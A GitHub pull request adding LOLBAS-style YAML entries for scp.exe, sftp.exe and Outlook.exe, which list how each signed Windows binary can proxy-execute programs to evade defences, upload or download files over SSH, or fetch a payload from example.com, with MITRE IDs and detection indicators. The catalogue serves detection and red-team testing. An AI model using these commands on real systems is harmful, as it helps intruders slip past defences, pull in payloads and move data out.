Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add scp.exe for execute download upload and copy #265

Open
wants to merge 9 commits into
base: master
Choose a base branch
from
Open

Add scp.exe for execute download upload and copy #265

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
9 commits
Select commit Hold shift + click to select a range
860246f
Add sftp.exe executor
C-h4ck-0 Nov 6, 2022
da86328
Rename sftp to sftp.yml
C-h4ck-0 Nov 6, 2022
8fafb02
fix yaml-lint syntax error
C-h4ck-0 Nov 6, 2022
0c0e242
Add Outlook.exe downloader
C-h4ck-0 Nov 8, 2022
613afe8
Create scp.yml
C-h4ck-0 Nov 13, 2022
354553e
Update scp.yml
C-h4ck-0 Nov 14, 2022
ac294b0
Merge pull request #2 from LOLBAS-Project/master
C-h4ck-0 Nov 14, 2022
519b5fc
Update scp.yml
C-h4ck-0 Nov 14, 2022
e39a3af
Update scp.yml
C-h4ck-0 Nov 14, 2022
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
42 changes: 42 additions & 0 deletions yml/OSBinaries/scp.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,42 @@
---
Name: scp.exe
Description: Secure Copy Protocol
Author: Nir Chako
Created: 2022-11-14
Commands:
- Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:'
Description: Execute notepad.exe with scp.exe as parent process
Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
Description: Download file with scp.exe from an SSH server
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: "scp <path_of_local_file_to_upload> <ssh-username>@192.168.187.128:<path_to_save_file>"
Description: Upload file with scp.exe to an SSH server
Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session.
Category: Upload
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: "scp <source_file_path> <copy_destination_path>"
Description: Copy file with scp.exe to a local path
Usecase: Use scp.exe to Copy a file from one location to another.
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\OpenSSH\scp.exe
Detection:
- IOC: scp.exe spawning unexpected processes
- IOC: Suspicious SSH internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'
20 changes: 20 additions & 0 deletions yml/OSBinaries/sftp.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
---
Name: sftp.exe
Description: SSH File Transfer Protocol
Author: Nir Chako
Created: 2022-11-06
Commands:
- Command: "sftp -D c:\\windows\\system32\\notepad.exe"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\OpenSSH\sftp.exe
Detection:
- IOC: sftp.exe spawning unexpected processes
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'
34 changes: 34 additions & 0 deletions yml/OtherMSBinaries/Outlook.yml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,34 @@
---
Name: Outlook.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-11-08
Commands:
- Command: Outlook.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
Detection:
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'